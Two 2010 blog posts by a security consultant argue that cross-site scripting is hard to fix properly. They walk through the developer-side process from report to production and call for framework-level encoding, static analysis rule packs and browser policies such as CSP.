Sunday 26 September 2010

Why do we think we can comment on the 'easiness' level of XSS?

Here is an important question: "What gives Security Consultants the right to comment on how 'easy' it is to fix an XSS vulnerability?"

After all, it is not the Security Consultant's that:

1) needs to figure out:
- the root-cause analysis of the XSS reported?
- where it should be fixed?
- what is the REAL impact to the business?
- what are the side effects of applying the code changes?
2) has to make business case to fix it (and delaying XYZ feature)
3) has to actually fix the vulnerability
4) will be fired if the fixed is applied wrongly
5) will be the one that has the deal any side-effects created by the fixes
6) has to pay for it

Surely the only people qualified (and entitled) to make this 'easiness' assessment (i.e. of how 'easy' it is to fix a particular vulnerability) are the application developers and business owners!

Now think about how it must feel from the other side (i.e. the developers) when we (security consultants) tell them that it is 'easy' to fix what we just reported them.

And just to add insult to injury, we also like to tell them (the developers) that they need 'Training' (i.e. "...we think that you should go back to School and learn about security before you are allowed to write more code...")

It is 'easy' to say that that is 'easy' to fix...

... specially by the crowd whose responsibility ends when the problem/XSS is reported


How many 'easy-to-fix' XSS have we fixed in the last 12 months

On the topic of 'easy-to-fix' XSS, one question that we should be able to answer (as an industry) is 'How many of those easy-to-fix have been actually fixed and pushed into production'.

After all, if they are 'easy' to fix (and cheaper to create,test, deploy, etc...) surely that means that the affected parties (application owners and developers) will have very little resistance in doing those fixes, right?

So where can I find these numbers? What I am after are three values:

1) # number of 'easy-to-fix' XSS discovered on real-world applications
2) # number of 'easy-to-fix' XSS discovered that were actually fixed and pushed into production
3) % of XSS discovered that fall into the 'easy-to-fix' category

If we don't have these numbers, how do we know we are being effective? and that they are indeed 'easy-to-fix'

On a Twitter thread after my previous blog post, Chris from Veracode commented that he guesses (i.e. no hard-data) that about 50% of the 'easy-to-fix' XSS that they have found at Veracode are now fixed and deployed into production.

Even assuming that that 50% number is correct (which looks a bit high to me, and if I remember correctly WhiteHat's numbers are much lower), shouldn't the 'easy-to-fix' number be much higher? After all they are 'easy-to-fix'

.....

As you can tell by my use of quotes on the 'easy-to-fix' concept, I don't buy that fixing XSS are easy to fix.

Even in the cases where the 'fix' is 'just' applying an encoding to particular method (let's say from Response.Write(Request["name"]) to Response.Write(AntiXSS.HtmlEncode(Request["Name"])) ) there is a big difference between 'making a code change' and 'pushing it into production'.

Here is a quick list of what should happen when a developer knows about an 'easy-to-fix' XSS vulnerability:

1) XSS is discovered by security consultant
2) XSS is communicated to the development team
3) Development team analyse the XSS finding:
- reproduce the XSS reported
- discover what causes the XSS (root-cause analysis)?
- what is the DOM context of the XSS injection point (Html, Attribute, Javascript block, CSS)
- was it a single instance/mistake or is it a systemic flaw?
- where can it be fixed?
- of the multiple places it can be fixed what is the one with the least impact?
- can it be solved/mitigated without making code changes, for example using an config setting or a WAF? (i.e. virtual patching)
- is there a clear understanding of the side-effects of applying the fixes?
- are there cases (or potential) for double encoding problems? (i.e. is there understanding of all the code + data paths that lead to the location of the fix?)
- were other parts of the application created with the assumption that there would be no encoding on that particular field? (which will break once the fix is applied)
- who is going to pay for the fix? the developers? the client?
4) Once a strategy is created to fix the XSS, put it on the development schedule and apply the fix
5) Test the fix and make sure:
- that the XSS was correctly resolved/mitigated (who will do this? the current testers/developers that were not aware of the XSS in the first place, or the original security consultant?)
- is there any business impact (i.e. does the application still behaves the same way and there is NO user-experience impact). Ideally this should be done by the QA team
6) Deploy the fix into production

(note that this is a simplified version of what tends to happen in the real world, since there are many other factors that affect this: from internal/external politics, to management support for security fixes, to lack of attacks, to the fact that the original team that created the application is long gone and the developer allocated to do the 'easy-to-fix' change doesn't really know how the application he/she is about to fix actually works,etc...)

Some would call the above process 'easy-to-fix' ....

For me 'easy-to-fix' code changes (if there is such a thing) are actions that:
- don't take much time,
- the amount of work (and side effects) that needs to be done is easy to understand/visualise
- are cheap
- can be deployed into production quickly and without worries
- DON'T have any potential to create business/user impact (this is the most important one)
- are in essence, invisible to just about all parties involved

I think the crowd that calls XSS 'easy-to-fix' are confusing 'looks easy to make the code change that I think would work' with 'making a code change that accurately resolves the reported problem without causing any impact to the application' (which is what matters to the developers/business-owners)

My fundamental problem with the 'easy-to-fix' concept is that it is calling the developers (and application owners):
- names (as in: "you guys are stupid for not fixing those problems, after all they are 'easy-to-fix'),
- it is alienating them, and
- it is showing them that we don't have a very good idea on how their applications and business work.

To see a more detailed explanation of this gap between security consultants 'recommendations' and what the business/developers think of it, see John Viega's Keynote at OWASP's AppSec Ireland conference

Saturday 25 September 2010

Can we please stop saying that XSS is boring and easy to fix!

XSS (Cross Site Scripting) is probably one of the harder problems to solve in a web application because fixing it properly implies that one has a perfect understanding of what is 'code' and what is 'data'

The problem with XSS (and most other web injection variation) is that the attacker/exploit is able to move from a 'data' field into a 'code' execution environment.

So saying that XSS is easy to fix and eradicate is the same thing as saying that Buffer Overflows are easy to fix and eradicate.

Also, saying that we know how to solve XSS is a red-herring because we DON'T know how to solve it. What do know is how to mitigate it and for the cases where we DO understand were we are mixing code and data, we can apply special protections.

But even today, in 2010, protecting against XSS is something that the developers MUST do, versus something that happens (and is enforced) by default by the frameworks/APIs used.

Take .NET for example. Although there is quite a lot of XSS protection in the .NET framework (auto-detection against common XSS exploits, most controls have auto-encoding by default, etc...) we still see a lot of XSS on ASP.NET applications. The reason these exists is because it is very hard for developers to have a full understanding of the encoding and location of the outputs they are creating. And until we solve this 'visibility' problem, we will not solve XSS

On a positive note, the SRE (Security Runtime Engine) that ships with the Anti-XSS API is an amazing tool because it transparently adds encoding to .NET Web Controls (and it takes into account double encoding problems which is what makes it amazing)

The only way we will ever start dealing properly with XSS is if:
a) the framework(s) developers use have context-aware-encoding on ALL outputs
b) there is no easy way to write raw HTML directly to the response-stream
c) there is no easy way for developers to mix HTML code with Data
d) when HTML needs to be created programatically, that needs go be outputted via an HTML DOM aware encoding API/method (like the ones that .NET AntiXSS has)
e) there are static analysis rule packs for each of the frameworks that document (in rules) the programmatically combinations that make XSS possible (in that framework/API)
f) the developers have immediate (or before checking-in code into production) feedback when they create an XSS in their applications
g) web applications have a communication channel with browsers, which will allow browsers to better understand what is code and what is data (Mozilla CSP is a great step in this direction)

The key to really deal with XSS is e) and f) , since these take into account the scenario that developers will mix code, and even in the best designed APIs/Frameworks there will ALWAYS be combinations that create XSS. Also, without this understanding of the data/code mappings (which is where XSS lives) we will struggle to create mappings for g)

One of my key strategies when developing the O2 Platform was to create an environment that helps the creation and propagation of these 'Framework Rule Packs', since from my point of view, every version of every framework (and APIs) will need one of theses Rule Packs.

Remember that: security knowledge, that is not available, in an consumable format by tools or humans, AT the exact moment when it is needed (by developers, system architects, etc...), is almost as good as non-existent.

For example: "... an MSDN article that explains that the FormsAuthentication cookie is not invalidated on logout... " is not good enough

what we need is an "...alert or note that only appears when the developers use FormsAuthentication that explains (with PoCs) the fact that (on sign out) the only thing that happens is that the client side cookies are deleted from the user's browser...". The PoCs (dynamic or static) are very important in this example, since in most cases the real vulnerability will only be relevant in more feature-rich versions of the application.

Bottom line: Solving XSS means solving the separation of Code vs Data in web applications

And THAT ... is something that we are still quite far off